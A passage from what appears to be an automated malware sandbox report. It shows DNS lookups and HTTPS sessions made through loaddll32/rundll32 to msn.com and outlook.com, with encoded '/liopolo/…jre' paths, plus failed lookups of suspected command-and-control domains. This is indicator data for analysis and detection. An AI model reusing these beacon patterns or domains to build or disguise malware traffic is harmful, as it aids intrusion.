                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)HHN-efz.ms-acdc.office.com52.98.152.242A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)HHN-efz.ms-acdc.office.com52.97.162.2A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:42.896547079 CEST8.8.8.8192.168.2.30xb0e4No error (0)HHN-efz.ms-acdc.office.com40.101.61.130A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST8.8.8.8192.168.2.30x12e4No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST8.8.8.8192.168.2.30x12e4No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST8.8.8.8192.168.2.30x12e4No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST8.8.8.8192.168.2.30x12e4No error (0)HHN-efz.ms-acdc.office.com52.97.151.82A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST8.8.8.8192.168.2.30x12e4No error (0)HHN-efz.ms-acdc.office.com52.97.212.194A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST8.8.8.8192.168.2.30x12e4No error (0)HHN-efz.ms-acdc.office.com52.97.137.242A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.057368040 CEST8.8.8.8192.168.2.30x12e4No error (0)HHN-efz.ms-acdc.office.com40.101.124.210A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:43.735552073 CEST8.8.8.8192.168.2.30x77d2No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)HHN-efz.ms-acdc.office.com52.97.151.2A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)HHN-efz.ms-acdc.office.com52.97.137.194A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)HHN-efz.ms-acdc.office.com52.97.178.34A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.454426050 CEST8.8.8.8192.168.2.30x792cNo error (0)HHN-efz.ms-acdc.office.com52.97.137.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.635159016 CEST8.8.8.8192.168.2.30xb80eNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.635159016 CEST8.8.8.8192.168.2.30xb80eNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.635159016 CEST8.8.8.8192.168.2.30xb80eNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.635159016 CEST8.8.8.8192.168.2.30xb80eNo error (0)FRA-efz.ms-acdc.office.com52.97.151.66A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.635159016 CEST8.8.8.8192.168.2.30xb80eNo error (0)FRA-efz.ms-acdc.office.com52.98.208.50A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:23:44.635159016 CEST8.8.8.8192.168.2.30xb80eNo error (0)FRA-efz.ms-acdc.office.com52.97.218.66A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:03.371390104 CEST8.8.8.8192.168.2.30xef32Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:05.071163893 CEST8.8.8.8192.168.2.30x871dName error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:23.444994926 CEST8.8.8.8192.168.2.30x51No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:23.913043976 CEST8.8.8.8192.168.2.30xfb10No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:25.348794937 CEST8.8.8.8192.168.2.30xd3c5No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:25.849433899 CEST8.8.8.8192.168.2.30xb553No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:44.179295063 CEST8.8.8.8192.168.2.30x6bfcName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:24:46.375221014 CEST8.8.8.8192.168.2.30xb5e2Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:04.212004900 CEST8.8.8.8192.168.2.30x77e9No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                  Oct 12, 2021 00:25:06.417855024 CEST8.8.8.8192.168.2.30xc7d3No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • msn.com
                                                                                                                                  • outlook.com
                                                                                                                                  • www.outlook.com
                                                                                                                                  • outlook.office365.com

                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.34978213.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:22:58 UTC0OUTGET /mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: msn.com
                                                                                                                                  2021-10-11 22:22:58 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Location: https://www.msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre
                                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Date: Mon, 11 Oct 2021 22:22:58 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 384
                                                                                                                                  2021-10-11 22:22:58 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 72 5f 32 46 64 46 70 6b 52 34 56 64 74 73 4e 30 38 61 2f 5f 32 42 6d 69 52 72 64 6f 2f 69 52 50 56 69 30 74 57 41 53 63 67 35 73 56 47 66 6f 36 36 2f 68 55 46 5f 32 42 44 62 5f 32 42 54 76 73 65 35 76 54 32 2f 4f 47 56 63 34 54 4e 78 49 38 4f 4e 58 4d 6a 7a 50 4a 48 31 6b 6e 2f 69 69 4b 72 79 45 58 32 79 6d 4e 30 54 2f 32 59 58 5f 32 42 73 5f 2f
                                                                                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.34978413.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:01 UTC1OUTGET /mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/zwOfFpRmM9Pcjtlo/mhxUAWIol_2Bidj/ZyUBkmkt9UDUf59heB/_2Fa01_2F/fe5khD18VNL3grTs1oBD/Gp7Xm3KoaUrn2NbkVi4/PAUVXoXppe_2FqPWphraUo/OvKmQ_2F/8LQ.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: msn.com
                                                                                                                                  2021-10-11 22:23:01 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Location: https://www.msn.com/mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/zwOfFpRmM9Pcjtlo/mhxUAWIol_2Bidj/ZyUBkmkt9UDUf59heB/_2Fa01_2F/fe5khD18VNL3grTs1oBD/Gp7Xm3KoaUrn2NbkVi4/PAUVXoXppe_2FqPWphraUo/OvKmQ_2F/8LQ.jre
                                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:01 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 413
                                                                                                                                  2021-10-11 22:23:01 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 43 33 6e 5a 33 6f 6a 50 4b 75 76 4c 44 46 61 44 5f 32 46 56 4e 74 7a 2f 69 5f 32 42 49 54 5f 32 46 4d 2f 50 6b 4a 65 37 57 33 65 38 32 35 55 6c 5f 32 46 66 2f 6d 34 6d 37 35 38 33 45 78 68 5f 32 2f 46 58 67 71 49 59 32 59 49 47 34 2f 43 37 79 34 6f 57 5f 32 46 71 6e 4d 69 54 2f 55 58 45 38 61 64 56 69 71 4b 5f 32 46 30 65 6c 53 75 55 57 4b 2f 7a
                                                                                                                                  Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/z


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.34979340.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:42 UTC2OUTGET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.com
                                                                                                                                  2021-10-11 22:23:42 UTC3INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Location: https://www.outlook.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: e427b968-c179-19ee-eab5-c69a787deb18
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: MWHPR11CA0030
                                                                                                                                  X-RequestId: f7bccd31-1fe5-42bc-a78f-bd5067779086
                                                                                                                                  MS-CV: aLkn5HnB7hnqtcaaeH3rGA.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: MWHPR11CA0030
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:42 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.34979440.101.60.226443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:42 UTC3OUTGET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: www.outlook.com
                                                                                                                                  2021-10-11 22:23:43 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Location: https://outlook.office365.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 3ee32a65-f321-e918-2e40-dbfe04406261
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: AM5P194CA0018
                                                                                                                                  X-RequestId: 92a6e5ca-1271-47f5-a128-c722311c932a
                                                                                                                                  MS-CV: ZSrjPiHzGOkuQNv+BEBiYQ.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM5P194CA0018
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:42 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.34979552.97.151.82443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:43 UTC4OUTGET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.office365.com
                                                                                                                                  2021-10-11 22:23:43 UTC5INHTTP/1.1 404 Not Found
                                                                                                                                  Content-Length: 1245
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 0c8d249e-2aa6-4c4b-c0dd-a86db3f73cbe
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-CalculatedFETarget: AM0PR02CU003.internal.outlook.com
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-FEProxyInfo: AM0PR02CA0079.EURPRD02.PROD.OUTLOOK.COM
                                                                                                                                  X-CalculatedBETarget: AM0PR10MB2530.EURPRD10.PROD.OUTLOOK.COM
                                                                                                                                  X-BackEndHttpStatus: 404
                                                                                                                                  X-RUM-Validated: 1
                                                                                                                                  X-Proxy-RoutingCorrectness: 1
                                                                                                                                  X-Proxy-BackendServerStatus: 404
                                                                                                                                  MS-CV: niSNDKYqS0zA3ahts/c8vg.1.1
                                                                                                                                  X-FEServer: AM0PR02CA0079
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: AM6PR10CA0074
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:43 GMT
                                                                                                                                  Connection: close
                                                                                                                                  2021-10-11 22:23:43 UTC6INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.34979640.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:44 UTC7OUTGET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: outlook.com
                                                                                                                                  2021-10-11 22:23:44 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Location: https://www.outlook.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre
                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                  request-id: 7476278a-8573-403d-bda4-a5e2da3086ad
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  X-FEServer: MWHPR11CA0027
                                                                                                                                  X-RequestId: 8c7971ac-3435-454b-9ce5-da2c04cd34f2
                                                                                                                                  MS-CV: iid2dHOFPUC9pKXi2jCGrQ.0
                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                  X-FEServer: MWHPR11CA0027
                                                                                                                                  Date: Mon, 11 Oct 2021 22:23:44 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.34979752.97.151.2443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-10-11 22:23:44 UTC8OUTGET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                  Host: www.outlook.com
                                                                                                                                  2021-10-11 22:23:44 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
